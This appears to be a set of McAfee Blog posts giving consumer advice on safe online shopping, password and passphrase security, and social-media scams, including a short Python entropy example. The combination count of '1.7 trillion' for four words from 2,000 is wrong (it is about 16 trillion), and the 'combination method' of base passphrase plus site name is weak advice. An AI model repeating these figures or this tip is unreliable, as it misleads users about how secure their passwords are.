    • Be extra vigilant: Cybercriminals send millions of fake shopping emails that contain suspicious links, with the aim of exploiting your anxiety over catching that amazing deal or deliveries. For example, you might receive an unexpected “Amazon Prime renewal” email or a text from UPS, FedEx, or other carriers when you didn’t purchase anything online. These phishing emails and texts contain malicious links designed to steal your personal information or install malware on your devices. Don’t click the link. Verify delivery notifications through your account or the carrier’s official website or app, then delete the scam email or text immediately.
    • Stick with trusted sellers: When shopping on marketplaces, stick with your trusted online retailers and sellers with high ratings, extensive review histories, and “fulfilled by” programs where the main platform handles shipping and returns. Download retailer apps directly from official app stores rather than third-party sources, as these include enhanced security features and exclusive customer protections.
    • Check the site’s web address: Always type retailer URLs directly into your browser’s address bar or use your bookmarks. Once you arrive at a site, make sure it is the correct URL such as www.amazon.com and not www.amazan.com. Purchase directly from official brand websites or authorized retailers, and verify seller credentials through the brand’s official dealer locator when shopping on marketplaces.
    • Check that the site is secure: It isn’t always obvious whether a site is secure. Things to look for include:
      • A web address that starts with HTTPS instead of HTTP, indicating that encryption is used to protect your information.
      • A lock symbol beside the URL, proper SSL certificates, and several contact methods.
      • A security seal, such as the McAfee SECURE™ trustmark, indicating that the site has been scanned and verified by a trusted third party. A genuine seal links to a verification page on the issuer’s site; a seal that is just a static image, which anyone can copy onto a fake store, proves nothing on its own.
    • Pay with a credit card or digital wallet: Credit cards offer better protection against fraud than debit cards. U.S. law caps your liability for unauthorized credit card charges at $50 and most issuers waive even that, whereas a compromised debit card lets thieves draw directly on your bank balance while you dispute the charges. Better yet, use a virtual credit card number or a digital wallet such as Apple Pay or Google Pay so your actual card details are never stored on merchant sites. Also, avoid saving your credit card information on new or questionable sites to reduce your exposure if those sites are breached.
    • Take note of shipping and return policies: Always review shipping timelines, return windows, and refund policies before completing your purchase. Not reading the fine print can leave you stuck with unwanted purchases or unexpected fees.
    • Validate social media sellers: Shopping directly through social media platforms or unknown sellers bypasses traditional consumer safeguards. Before you buy from a social media seller, verify their legitimacy, check for customer reviews outside the platform, and use payment methods that offer dispute resolution.
    • Keep communications on-platform: Never move conversations or payments outside the marketplace platform. Scammers often try to lure buyers to external communication channels or direct payment methods to circumvent buyer protections. Legitimate sellers understand that platform policies protect both parties and will keep all interactions within the official channels.
    • Do not use a public computer or Wi-Fi when shopping online: A shared computer may keep your browsing history, autofilled forms, and saved logins for the next user, and a hostile public network can redirect you to fake sites or interfere with connections that aren’t properly secured. Shop from your own device, and if you must use public Wi-Fi, use a VPN or your phone’s mobile data instead.
    • Make sure you have a clean computer or mobile device: Make sure you have up-to-date security software on all your devices to safeguard your privacy, protect against identity theft, and defend against viruses and online threats.
    • Keep a paper trail: Take a screenshot of product listings and advertisements before purchasing. Keep a copy of your order number and receipt, and note which credit card you used. When you receive your credit card statement, review it to make sure that the charge on your card is correct, with no extra fees.

    The FTC also recommends these additional tips so you can enjoy all the advantages that online shopping has to offer and prevent risking your personal information.

    Immediate steps to take if you ordered from a fake online store

    1. Contact your credit card issuer immediately: Call the customer service number on the back of your card once you realize you’ve been scammed. Request a chargeback and explain that you received counterfeit goods, nothing at all, or that the merchant was fraudulent. You usually have 60 days from your statement date to dispute charges, but acting quickly improves your chances of a successful resolution.
    2. Freeze or replace your payment card: Contact your bank or card issuer to freeze your current card and request a replacement with a new number to prevent further unauthorized charges. If you used a debit card, this step is especially critical, since debit card fraud protections are more limited than those for credit cards.
    3. Change your passwords and enable two-factor authentication: If you created an account on the fake website, change your password immediately on your real account and any linked accounts such as email, banking, and social media. Enable two-factor authentication and think about using a password manager to generate and store unique passwords for each account.
    4. Report the fraudulent seller to the platform or hosting service: Protect other consumers by reporting the fake store. If the site appeared in search results or social media ads, report it to those platforms. You can also report fraudulent websites to their hosting companies to take down fraudulent sites once notified.
    5. File reports with federal and state authorities: Report the scam to the Federal Trade Commission (FTC) and the Internet Crime Complaint Center (IC3) to help authorities track scam trends and assist in investigations. Additionally, contact your state’s attorney general office, as many have consumer protection divisions that handle online fraud.
    6. Save and organize all evidence: Document everything related to your purchase in both digital and printed formats: screenshots of the website, confirmation emails, receipts, payment records, and any communication with the seller. Save copies of your credit card or bank statements showing the charge. These documents are essential for your chargeback dispute and law enforcement investigations.
    7. Monitor your credit report and identity closely: Keep a close eye on your bank and credit card statements, as well as credit reports from all three major bureaus—Experian, Equifax, and TransUnion—for suspicious activity, and place a fraud alert or credit freeze on your accounts if you’re concerned about identity theft.
    8. Follow up on your chargeback and dispute process: Stay in regular contact with your credit card company about your dispute and provide additional documents promptly if requested. Be patient and persistent as the investigation process could take up to 90 days.

    Final thoughts

    Online shopping should feel exciting, not a dangerous undertaking you have to brace for, especially during the season of giving. It can be, with a few simple steps—checking the URL, looking for HTTPS, verifying the seller, paying with a credit card or virtual number, and trusting your gut when something feels suspicious. These small habits will keep your money and your identity where they belong: with you.

    For increased safety while shopping online, seek out the help of a trusted security solution such as McAfee+ that will alert you of risky links and compromised websites to prevent identity theft or malware infection.

    If this guide helps you, pass it along to someone you care about. Scams don’t just target individuals—they cascade into families and friend groups. The more we normalize safe shopping habits and increase our vigilance, the harder it is for fraudsters to win. If you ever feel unsure mid-purchase, take a breath and double-check. A few extra seconds now can save you a lot of stress later. Stay safe, and happy shopping!

    The post Helpful Tips for Safe Online Shopping appeared first on McAfee Blog.

    15 Vital Tips To Better Password Security

    By: McAfee

    Even as passkeys and biometric sign-ins become more common, nearly every service still relies on a password somewhere in the process—email, banking, social media, health portals, streaming, work accounts, and device logins.

    Most people, however, don’t realize the many ways we make our accounts vulnerable due to weak passwords, enabling hackers to easily crack them. In truth, password security isn’t complicated once you understand what attackers do and what habits stop them.

    In this guide, we will look into the common mistakes we make in creating passwords and offer tips on how you can improve your password security. With a few practical changes, you can make your accounts dramatically harder to compromise.

    Password security basics

    Modern password strength comes down to three truths. First, length matters more than complexity. Every extra character multiplies the number of guesses an attacker must make. Second, unpredictability matters because attack tools prioritize the most expected human choices first. Third, usability matters because rules that are painful to follow lead to workarounds like reuse, tiny variations, or storing written passwords in unsafe ways. Strong password security is a system you can sustain, not a heroic one-time effort.

    Protection that strong passwords provide

    Strong passwords serve as digital barriers that are more difficult for attackers to compromise. Mathematically, password strength works in your favor when you choose well. A truly random 12-character password drawn from the 95 printable ASCII characters (uppercase, lowercase, digits, and symbols) has 95^12, or roughly 5 × 10^23, possible combinations. Even with advanced computing power, testing all of them takes far more time and resources than most attackers are willing to spend when easier targets are available.

    This protection multiplies when you use a unique password for each account. Instead of one compromised password providing access to multiple services, attackers must overcome several independent security challenges, dramatically reducing your overall risk profile.

    Benefits of good password habits

    Developing strong password security habits offers benefits beyond protecting your accounts. These habits contribute to your overall digital security posture and create positive momentum for other security improvements, such as:

    • Reduced attack success: Strong, unique passwords make you a less attractive target for cybercriminals who prefer easier opportunities.
    • Faster recovery: When security incidents do occur, good password practices limit the scope of damage and accelerate recovery.
    • Peace of mind: Knowing your accounts are well-protected reduces anxiety about potential security threats.
    • Professional credibility: Good security habits demonstrate responsibility and competence in professional settings.
    • Family protection: Your security practices often protect family members who share devices or accounts.

    The impact of weak passwords

    On the other hand, weak passwords are not just a mild inconvenience. They enable account takeovers and identity theft, and can become the master key to your other accounts. Here’s a closer look at the consequences:

    Your digital identity becomes someone else’s

    Account takeover happens when cybercriminals gain unauthorized access to your online accounts using compromised credentials. They could impersonate you across your entire digital presence, from email to social media. For instance, they can send malicious messages to your contacts, make unauthorized purchases, and change your account recovery information to lock you out permanently.

    The effects of an account takeover can persist for years. You may discover that attackers used your accounts to create new accounts in your name, resulting in damaged relationships and credit scores, contaminated medical records, employment difficulties, and legal complications with law enforcement.

    The immediate and hidden costs of financial loss

    Financial losses from password-related breaches aren’t limited to money stolen from your accounts. Additional costs often include:

    • Bank penalty fees from overdrawn accounts
    • Needing to hire credit monitoring services to prevent future fraud
    • Legal fees for professional help resolving complex cases
    • Lost income from time spent dealing with fraud resolution
    • Higher insurance premiums due to damaged credit

    The stress and time required to resolve these issues also affect your overall well-being and productivity.

    Your personal life becomes public

    Your passwords also guard your personal communications, private photos, confidential documents, and intimate details about your life. When these barriers fail, you could find your personal photos and messages shared without consent, or confidential business information in competitors’ hands. The psychological, emotional, and professional impact of violated trust can persist long after the immediate crisis passes.

    15 tips for better password security: Small steps, big impact

    You can dramatically improve your password security with relatively small changes. No need to invest in expensive or highly technical tools to substantially improve your security. Here are some simple tips for better password security:

    1) Long passwords are better than short, “complex” passwords

    If you take away only one insight from this article, let it be this: password length is your biggest advantage. Every extra character multiplies the search space, so a long password takes brute-force tools far longer to exhaust. Instead of trying to remember short strings packed with symbols, use passphrases made of several unrelated words. Something like “candle-river-planet-tiger-47” is both easy to recall and extremely hard to crack. For most accounts, 12–16 characters is a solid minimum; for critical accounts, longer is even better.

    2) Never reuse passwords

    Password reuse is the reason credential stuffing works. When one site is breached, attackers immediately test those leaked credentials on other services. If you reuse those credentials, you have effectively handed over the keys to your kingdom. Unique passwords block that entry: even if a shopping site leaks your password, your email and banking stay protected because their passwords are different.

    3) Don’t use your personal information

    Attackers always try the obvious human choices first: names, birthdays, pets, favorite teams, cities, schools, and anything else that could be pulled from social media or public records. Even combinations that feel “creative,” such as a pet name plus a year, tend to be predictable to cracking tools. Your password should be unrelated to your life.

    4) Avoid patterns and common substitutions

    In the past, security experts encouraged people to replace letters with symbols, turning “password” into “P@ssw0rd” and calling it secure. That advice no longer holds, as attack tools check these substitutions automatically. The same goes for keyboard walks (qwerty, asdfgh), obvious sequences (123456), and small variations like “MyPassword1” and “MyPassword2.” If your password pattern makes sense to a human, a modern cracking tool will decipher it in seconds.

    5) Use a randomness method you trust

    Humans think they’re random, but they aren’t. We pick symbols and words that look good together, follow habits, and reuse mental templates. Two reliable ways to break that habit are Diceware, an online dice-rolling tool that selects words from a list, and password generators; both produce randomness far better than a human brain can. In addition, the variety of characters in your password affects its strength. Using only lowercase letters gives you 26 possible characters per position, while combining uppercase, lowercase, numbers, and symbols expands this to over 90 possibilities.

    6) Match password strength to account importance

    Not every account needs the same level of complexity, but every account needs to be better than weak. For email, banking, and work systems, use longer passphrases or manager-generated passwords of 20 characters or more. For daily convenience accounts such as shopping or social media, a slightly shorter but still unique passphrase is fine. For low-stakes logins you rarely use, still keep at least a 12-character unique password. This keeps your accounts secure without being mentally exhausting.

    7) Turn on multi-factor authentication where possible

    Multi-factor authentication (MFA) adds a second checkpoint in your security, stopping most account takeovers even if your password leaks. Authenticator apps are stronger than SMS codes, which can be intercepted in SIM-swap attacks. Hardware or physical security keys are even stronger. Start with your email and financial accounts, then expand to everything that offers MFA.

    8) Learn to spot phishing scams to prevent stolen passwords

    A perfect password is useless if you type it into the wrong place. Phishing attacks work by imitating legitimate login pages or sending urgent messages that push you to click. Build the habit of checking URLs in unsolicited emails or texts, being wary of pressure tactics, and taking a moment to question the message. When in doubt, open a fresh tab and navigate to the service directly.

    9) Avoid signing in on shared devices

    You may not know it, but shared computers may carry keyloggers, unsafe browser extensions, or saved sessions from other users. If you have no choice but to sign in using a shared device, don’t allow the browser to save your log-in details, log out fully afterward, and change the password later from your own device.

    10) Be careful with public Wi-Fi

    On public networks in places such as cafes or airports, cybercriminals could be prowling for their next victim. Attackers sometimes create fake hotspots with familiar names to trick people into connecting. Even on real public Wi-Fi, traffic can be intercepted. The safest choice is to avoid logging into sensitive accounts on public networks. If you must use public Wi-Fi, protect yourself by using a reputable virtual private network and verifying that the site uses HTTPS.

    11) Ensure your devices, apps, and security tools are updated

    Many password thefts happen as a result of compromised devices and software. Outdated operating systems and browsers can contain security vulnerabilities known to hackers, leading to malware invasion, session hijacking, or credential harvesting. The best recourse is to set up automatic updates for your OS, browser, and antivirus tool to remove a huge chunk of risk with no additional effort from you.

    12) Use a reputable password manager

    Password managers solve two hard problems at once: creating strong unique passwords and remembering them. They store credentials in an encrypted vault protected by a master password, generate high-entropy passwords automatically, and often autofill only on legitimate sites (which also helps against phishing). In practice, password managers are what make “unique passwords everywhere” feasible.

    13) Protect your password manager like it’s your digital vault

    Of all your credentials, the master password that opens your password manager is the one you must memorize. Make it long, passphrase-style, and make sure you have never reused it anywhere else. Then add MFA to the manager itself. This makes it extremely difficult for someone to get into your vault even if they somehow learn your master password.

    14) Audit and update passwords when there’s a reason

    The old “change every 90 days no matter what” guideline could backfire, leading to password-creation fatigue and encouraging people to make only tiny predictable tweaks. A smarter approach is to update only when something changes in your risk: a breach, a suspicious login alert, or a health warning from your password manager. For critical accounts, doing a yearly review is a reasonable rhythm.

    15) Reduce your attack surface by cleaning up old accounts

    Unused accounts are easy to forget and easy to compromise. Delete services you don’t use anymore, and review which third-party apps are connected to your Google, Apple, Microsoft, or social logins. Each unnecessary connection is another doorway you don’t need open.

    Practical implementation strategies for passphrases

    As mentioned in the tips above, passphrases have become the better, more secure alternative to traditional passwords. A passphrase is essentially a long password made up of multiple words, forming a phrase or sentence that’s meaningful to you but not easily guessed by others.

    Attackers use sophisticated programs that can guess billions of predictable password combinations per second using common passwords, dictionary words, and patterns. But when you string together four random words, you create over 1.7 trillion possible combinations, even though the vocabulary base contains only 2,000 common words.

    Your brain, meanwhile, is great at remembering stories and images. When you think “Coffee Bicycle Mountain 47,” you might imagine riding your bike up a mountain with your morning coffee, stopping at mile marker 47. That mental image sticks with you in ways that “K7#mQ9$x” never could.

    This approach, which blends unpredictability with the human ability to remember stories, offers the ideal combination of security and usability.
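    To make the strength comparison in the two passages above concrete (alphabet size per position for character passwords, vocabulary size and word count for passphrases), here is an added Python example; it is not McAfee’s code, the word list is a constructed sample, and the alphabet sizes and guess rate are assumptions used only for illustration.

```python
import math
import secrets

# Constructed, illustrative word list: a real Diceware list has 7,776 words.
# Strength comes from how many words the list holds and how many you draw,
# not from which words they are.
SAMPLE_WORDLIST = [
    "candle", "river", "planet", "tiger", "elephant", "tumbler", "stapler",
    "running", "coffee", "bicycle", "mountain", "harbor", "velvet", "quartz",
    "lantern", "meadow",
]

# Assumed alphabet sizes for character-based passwords.
LOWERCASE = 26
LOWER_UPPER_DIGITS = 62
PRINTABLE_ASCII = 94          # printable ASCII without the space character


def search_space(choices_per_position: int, positions: int) -> int:
    """Number of equally likely secrets when every position is drawn uniformly
    from `choices_per_position` options. Works for characters or whole words."""
    return choices_per_position ** positions


def entropy_bits(choices_per_position: int, positions: int) -> float:
    """Entropy in bits of a uniformly random secret of the given shape."""
    return positions * math.log2(choices_per_position)


def years_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Worst-case time for an attacker to try every candidate at a given rate
    (the rate is an assumption; real rates depend on the hash in use)."""
    return space / guesses_per_second / (365 * 24 * 3600)


def compare(char_len: int, alphabet: int, wordlist_size: int, n_words: int) -> dict:
    """Compare a random character password with a random word passphrase."""
    return {
        "char_bits": round(entropy_bits(alphabet, char_len), 1),
        "word_bits": round(entropy_bits(wordlist_size, n_words), 1),
    }


def generate_passphrase(wordlist, n_words: int, separator: str = "-") -> str:
    """Draw words with the OS CSPRNG via `secrets`; never use `random`, which
    is not suitable for security-sensitive choices."""
    return separator.join(secrets.choice(wordlist) for _ in range(n_words))


if __name__ == "__main__":
    # Four words drawn from a 2,000-word vocabulary.
    print(search_space(2000, 4), "candidates,", round(entropy_bits(2000, 4), 1), "bits")
    # An 8-character random password from ~94 characters vs. four Diceware words.
    print(compare(char_len=8, alphabet=PRINTABLE_ASCII, wordlist_size=7776, n_words=4))
    # Assumed 1e9 guesses/s: years to exhaust a five-word Diceware passphrase.
    print(round(years_to_exhaust(search_space(7776, 5), 1e9), 1), "years")
    print(generate_passphrase(SAMPLE_WORDLIST, 4))
```

    The comparison shows why word count matters more than symbols: four random Diceware words carry about as much entropy as eight fully random printable characters, and are far easier to remember.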

    To help you create more effective passphrases, here are a few principles you can follow:

    • Use unrelated words: Choose words that don’t naturally go together. “Sunset beach volleyball Thursday” is more predictable than “elephant tumbler stapler running” because the first phrase contains related concepts.
    • Add personal meaning: While the words shouldn’t be personally identifiable, you can create a mental story or image that helps you remember them. This personal connection makes the passphrase memorable without making it guessable.
    • Avoid quotes and common phrases: Don’t use song lyrics, movie quotes, or famous sayings. These appear in dictionaries and can be vulnerable to specialized attacks.
    • The sentence method: Create a memorable sentence and use the first letter of each word, plus some numbers or punctuation. “I graduated from college in 2010 with a 3.8 GPA!” becomes “IgfCi2010wa3.8GPA!” This method naturally creates long, unique passwords.
    • The story method: Create a memorable short story using random elements and turn it into a passphrase. “The purple elephant drove a motorcycle to the library on Tuesday” becomes “PurpleElephantMotorcycleLibraryTuesday” or can be used as-is with spaces.
    • The combination method: Combine a strong base passphrase with site-specific elements. For example, if your base is “CoffeeShopRainbowUnicorn,” you might add “Amazon” for your Amazon account: “CoffeeShopRainbowUnicornAmazon.”
    • Use mixed case: For maximum security, the mixed-case approach capitalizes random letters within words: “coFfee biCycLe mouNtain 47.” This dramatically increases entropy while remaining typeable.
    • Add symbols: When used sparingly, this technique adds complexity. You can separate the words or substitute some letters with random symbols. But make sure you will remember them.
    • Use words from other languages: Multi-language passphrases offer a layer of security, assuming you’re comfortable with multiple languages. “Coffee Bicicleta Mountain Vier” combines English, Spanish, and German words, creating combinations that appear in no standard dictionary.
    • Personalize it: For the security-conscious, consider adding random elements that hold personal meaning, as long as this information isn’t publicly available. It could be the coordinates of a special place or a funny inside story within your family.

    Password managers: Your password vault

    Password managers are encrypted digital vaults that store all your login credentials behind a single master password. They are your personal security assistant that never forgets, never sleeps, and constantly works to keep your accounts protected with unique, complex passwords.

    Modern password managers create passwords that are truly random, combining uppercase and lowercase letters, numbers, and special characters in patterns that are virtually impossible for cybercriminals to guess or crack through brute force attacks. These passwords typically range from 12 to 64 characters long, exceeding what most people could realistically remember or type consistently.

    Encryption scrambles your passwords

    Your passwords are scrambled with strong cryptographic algorithms before they are saved. This means that even if someone gained access to your password manager’s servers, your actual passwords would appear as meaningless strings of random characters without the encryption key. Only you possess this key, which is derived from your master password.

    The auto-fill functionality also offers convenience, recognizing the login page of your account and instantly filling in your username and password with a single click or keystroke. This seamless process happens across operating systems, browsers, and devices—your computer, smartphone, and tablet—keeping your credentials synchronized and accessible wherever you need them.

    Choose a reputable password manager

    Selecting the right password manager requires careful consideration of several factors that directly impact your security and user experience.

    The reputation and track record of the company offering the password manager should be your first consideration. Look for companies that have been operating in the security space for several years and have a transparent approach to security practices.

    Reputable companies regularly undergo independent security audits by third-party cybersecurity firms to examine the password manager’s code, encryption methods, and overall security architecture. Companies that publish these audit results demonstrate transparency and commitment to security.

    Also consider password managers that use AES-256 encryption, currently the gold standard for data protection used by government agencies and financial institutions worldwide. Additionally, ensure the password manager employs zero-knowledge architecture, meaning the company cannot access your passwords even if they wanted to.

    Intuitive user interface, reliable auto-fill functionality, responsive customer support, and ease of use should be checked as well. A password manager that is confusing to navigate or constantly malfunctions will likely be abandoned, defeating the purpose of improved password security.

    Choose a solution that offers features beyond basic password storage. Modern password managers often include secure note storage for sensitive information such as Social Security numbers and passport details, password sharing capabilities for family accounts, and dark web monitoring that alerts you if your credentials appear in data breaches.

    Final thoughts

    Strong password security doesn’t have to be complicated. Small changes you make today can dramatically improve your digital security. By creating unique, lengthy passwords or passphrases for each account and enabling multi-factor authentication on your most important services, you’re taking control of your online safety.

    Consider adopting a reputable password manager to simplify the process while maximizing your protection. It’s one of the smartest investments you can make for your digital security.

    The post 15 Vital Tips To Better Password Security appeared first on McAfee Blog.

    15 Critical Tips to Stay Safe on Social Media

    By: McAfee

    Social media platforms connect you to thousands of people worldwide. But while these platforms offer incredible opportunities for bonding, learning, and entertainment, they also present personal security challenges. Navigating them safely requires being aware of risks and proactively protecting your accounts.

    The three most common risks you’ll encounter are privacy exposure, account takeover, and scams. Privacy exposure occurs when your personal information becomes visible to unintended audiences, potentially leading to identity theft, stalking, or professional damage. You have control over your social media security. By implementing safe social media practices, you can dramatically reduce your risk exposure.

    This guide rounds up 15 practical, everyday tips to help you secure your accounts and use them more safely. It covers smart posting habits, safer clicking and app-permission choices, stronger privacy settings, and core security basics like using updated browsers, reliable protection tools, and identity-theft safeguards—so you can enjoy social media without making yourself an easy target.

    Before we dive in, a reminder: for anything unsolicited, unusual, or suspicious on social media, our strongest recommendation is this: verify, verify, verify through separate communication channels such as phone, email, and official websites.

    15 top tips to stay safer on social media

    1. Realize that you can become a victim at any time.

    Not a day goes by when we don’t hear about a new hack. With 450,000 new pieces of malware released to the internet every day, security never sleeps. For your increased awareness, here’s a short list of the most common social media scams:

    • Giveaway and lottery scams: Fake contests promising expensive prizes like iPhones, gift cards, or cash in exchange for personal information or payment of “processing fees” before you can claim your prize.
    • Impersonation scams: Criminals create fake profiles mimicking friends, family members, celebrities, or trusted organizations to build false relationships and extract money or information from you. One warning sign is that the direct message, link, or post will originate from accounts with limited posting history or generic profile photos.
    • Romance scams: Fraudsters develop fake romantic relationships on social platforms over time, eventually requesting money for emergencies, travel, or other fabricated situations. Never send money to someone you’ve only met online and use reverse image searches to verify profile photos aren’t stolen.
    • Fake job offers: Scammers will post attractive employment opportunities, promising unrealistic salaries for minimal work. During your “onboarding,” the fake HR person will require upfront payments for equipment, training, or background checks, or use job interviews to harvest personal information such as Social Security numbers.
    • Cryptocurrency and investment scams: Fraudulent investment schemes promise guaranteed returns through cryptocurrency trading, forex, or other financial opportunities, often using fake testimonials and urgent time pressure. The fraudsters will promise guaranteed high returns, pressure you to invest quickly, and ask you to recruit friends and family into the “opportunity.”
    • Charity and disaster relief scams: Fake charitable organizations exploit current events, natural disasters, or humanitarian crises to solicit donations that never reach legitimate causes. They will pressure you for immediate donations, offer vague descriptions about how funds will be used, and request cash, gift cards, or cryptocurrency payments.
    • Shopping and marketplace spoofing: Phony online stores or marketplace sellers advertise products at suspiciously low prices, then collect payment but will never deliver the goods. If they do, it will likely be counterfeit. Be on guard for prices that are way below market value, poorly presented websites or badly written advertisements, pressure tactics, and limited payment options.

    2. Think before you post.

    Social media is quite engaging, with all the funny status updates, photos, and comments. However, all these bits of information can reveal more about you than you intended to disclose. The examples below might be extreme, but they are real-world scenarios that continue to happen to real people daily on social media:

    • Social engineering attacks: When you post details about your daily routine, workplace, or family members, scammers can use this information to build trust and manipulate you into revealing more sensitive information. Limit sharing specific details about your schedule and locations.
    • Employment and reputation damage: Potential employers increasingly review social media profiles during hiring processes, and controversial opinions, inappropriate content, or unprofessional behavior can eliminate your chances of being hired for job opportunities or damage your professional reputation. Similarly, personal relationships may be strained when private information is shared publicly or when posts reveal information that others expected to remain confidential.
    • Financial scams and fraud: Sharing details about expensive purchases, vacations, or financial situations makes you a target for scammers who craft personalized fraud attempts. Apply safe social media practices by avoiding posts about money, luxury items, or financial struggles that could attract unwanted attention from fraudsters.

    3. Nothing good comes from filling out a “25 Most Amazing Things About You” survey.

    Oversharing on social media creates significant risks that extend beyond embarrassment or regret. Identity thieves actively monitor social platforms for personal information they can use to answer security questions, predict passwords, or impersonate you in social engineering attacks.

    Avoid publicly answering questionnaires with details like your middle name, as this is the type of information financial institutions—and identity thieves—may use to verify your identity.

    • Password reset clues: Sharing your birth date, hometown, or pet’s name gives cybercriminals the answers to common security questions used in password resets. Do your best to keep personal details private and use unique, unguessable answers for security questions that only you would know.
    • Identity theft: Oversharing personal information such as your full name, address, phone number, and family details gives identity thieves the building blocks to impersonate you or open accounts in your name. These details also frequently serve as backup authentication methods for your email or bank accounts, which is exactly why identity thieves want them. Protect your accounts by tightening privacy settings and limiting the information in your profile and posts.
    • Doxxing: The publication of your private information without consent is another malicious consequence of oversharing. Your seemingly harmless social media posts can be combined with other public records to reveal your home address, workplace information, and family details, which can then be used to harass, intimidate, or endanger you and your loved ones as part of a scam or revenge scheme.
    • Data collection: The scope of data collection and its potential for misuse continues to evolve. Anything you share on social media becomes data for hundreds of third-party companies for advertising and analytics purposes that you may not realize. This widespread distribution of your personal information increases the odds that your data will be involved in a breach or used in nefarious ways.

    4. Think twice about applications that request permission to access your data.

    Third-party apps with excessive permissions can access your personal data, post to social media at any time on your behalf, or serve as entry points for attackers, regardless of whether you’re using the application. To limit app access and reduce your attack surface significantly, review all apps and services connected to your social media accounts. Revoke permissions to applications you no longer use or don’t remember authorizing.

    5. Don’t click on short links that don’t clearly show the link location.

    Shortened links can be exploited in social media phishing attacks as they hide the final destination URL, making it difficult for you to determine where it actually leads. These tactics mimic legitimate communications from trusted sources and come in the form of direct messages, comments, sponsored posts, and fake verification alerts, all in an effort to steal your personal information, login credentials, or financial details. Often, these attacks appear as urgent messages claiming your account will be suspended or fake prize notifications.

    When you identify phishing attempts, immediately report and block the suspicious accounts using the platform’s built-in reporting features. This will protect not only you but other users on the platform.

    If the link is posted by a product seller or service provider, it is a good idea to:

    1. Verify the link independently: Don’t click suspicious links or download files from unknown sources. Instead, navigate to official websites directly by typing the URL yourself or using trusted search engines.
    2. Verify the profile before engaging: Look for verified checkmarks, consistent posting history spanning several months or years, and mutual connections. As scammers often use stolen photos, check if the photo appears elsewhere online by doing a reverse image search.
    3. Use only trusted payment methods: Stick to secure payment platforms with buyer protection such as PayPal, credit cards, or official app payment systems. Never send money through wire transfers, gift cards, cryptocurrency, or peer-to-peer payment apps to strangers, as these transactions are irreversible and untraceable.
    4. Research sellers and causes thoroughly: Before making any purchase or donation, search for the business name online, check reviews on multiple sites, and verify charity registration numbers through official databases. Look up the organization’s official website and ensure that the business has verifiable contact information, a physical address, and good reviews.
    5. Keep conversations on the platform: Legitimate sellers and organizations rarely need to move discussions to private messaging apps, email, or phone calls immediately. When scammers push you off-platform, they’re avoiding security measures and community reporting systems.

    6. Beware of posts with subjects along the lines of, “LOL! Look at the video I found of you!”

    You might think the video or link relates directly to you. But when you click it, you get a message saying that you need to upgrade your video player in order to see the clip. When you attempt to download the “upgrade,” the malicious page will instead install malware that tracks and steals your data. As mentioned, don’t click suspicious links or download files from unknown sources before verifying independently. Visit the official websites by directly typing the URL yourself or using trusted search engines.

    This also brings us to the related topic of being tagged on other people’s content. If you don’t want certain content to be associated with you, adjust the settings that enable you to review posts and photos before they appear on your profile. This allows you to maintain control over your digital presence and prevents embarrassing or inappropriate content associations.

    7. Be suspicious of anything that sounds unusual or feels odd.

    If one of your friends posts, “We’re stuck in Cambodia and need money,” keep your radar up as it’s most likely a scam. It is possible that a scammer has taken over your friend’s account, and is using it to impersonate them, spread malicious content, or extract sensitive information from their contacts, including you. Don’t engage with this post or the fraudster, otherwise the next account takeover could be yours.

    In this kind of scam, some critical areas of your life are affected:

    • Financially, successful attacks can result in unauthorized purchases, drained bank accounts, or damaged credit scores through identity theft.
    • Your reputation faces threats from impersonation, where attackers post harmful content under your name, or from oversharing personal information that employers, colleagues, or family members might frown upon.
    • In terms of misusing your identity, criminals could further exploit your social media profile by collecting data from your posts to conduct other fraudulent activities, from opening accounts in your name to bypassing security questions on other services.

    When you encounter suspicious activity, always use official support pages rather than responding to questionable messages. Major social media platforms provide dedicated help centers and verified contact methods.

    • Configure message and comment filtering: Set up keyword filters to automatically block suspicious messages and enable message request filtering from unknown users. This helps you verify suspicious messages on social media before they reach your main inbox.
    • Watch for urgency and pressure tactics: Scammers create false urgency through “limited time offers” or “emergency situations” to prevent you from thinking clearly. Legitimate opportunities and genuine emergencies allow time for verification.

    8. Understand your privacy settings.

    Select the most secure options and check periodically for changes that can open up your profile to the public. Depending on your preference and the privacy level you are comfortable with, you can choose from these options:

    • Public profiles make your content searchable and accessible to anyone, including potential employers, strangers, and data collectors. This setting maximizes your visibility and networking potential but also increases your exposure to unwanted contact and data harvesting.
    • Friends-only profiles limit your content to approved connections, balancing your social interaction and privacy protection. This setting, however, doesn’t prevent your approved friends from reposting your content or protect you from data collection.
    • Private profiles provide the highest level of content protection, requiring approval for anyone to see your posts. While this setting offers maximum control over your audience, it can limit legitimate networking opportunities and may not protect you from all forms of data collection.

    We suggest that you review your privacy settings every three months, as platforms frequently update their policies and default settings. While you are at it, take the opportunity to audit your friend lists and remove inactive or suspicious accounts.

    9. Reconsider broadcasting your location.

    Posting real-time locations or check-ins can alert potential stalkers to your whereabouts and routine patterns, while geo-tagged photos can reveal where you live, study, work, shop, or work out. Location sharing creates patterns that criminals can exploit for security threats such as stalking, harassment, and other physical crimes.

    To avoid informing scammers of your whereabouts, turn off location tagging in your social media apps and avoid posting about your routine. You might also consider disabling “last seen” or “active now” indicators that show when you’re online. This prevents others from monitoring your social media activity patterns and reduces unwanted contact attempts, significantly improving your personal and family safety while maintaining your ability to share experiences.

    10. Use an updated browser, social media app, and devices.

    Older browsers tend to have more security flaws and often don’t recognize newer scam patterns, while updated versions patch known vulnerabilities. Updates add or improve privacy controls such as tracking prevention, cookie partitioning, third-party cookie blocking, stronger HTTPS enforcement, and transparent permission prompts. They also support newer HTML/CSS/JavaScript features, video and audio codecs, payment and login standards, and accessibility features.

    In terms of performance, new browser versions offer faster performance, better memory management, and more efficient rendering, so you get fewer freezes, less fan noise, longer battery life, and better extension compatibility.

    11. Choose unique logins and passwords for each of the websites you use.

    Consider using password managers, which can create and store secure passwords for you. Never reuse passwords across platforms. This practice ensures that if one account is compromised, your other accounts remain secure. Password managers also help you monitor for breached credentials and update passwords regularly.

    In addition, implement multi-factor authentication (MFA) on every social media account using authenticator apps. This single step can protect social media accounts from 99% of automated attacks. MFA enforcement should be non-negotiable for both personal and business accounts, as it adds critical security that makes account takeovers exponentially more difficult.

    12. Check the domain to be sure that you’re logging into a legitimate website.

    Scammers build fake login pages that look identical to real ones. The only obvious difference is usually the domain. They want you to type your username/password into their site, so they can steal it. So if you’re visiting a Facebook page, make sure you look for the https://www.facebook.com address.

    The rule is to read the domain from right to left because the real domain is usually the last two meaningful segments before the slash. For instance, https://security.facebook.com—read from right to left—is legitimate because the main domain is facebook.com, and “security” is just a subdomain.

    Watch out for scam patterns such as:

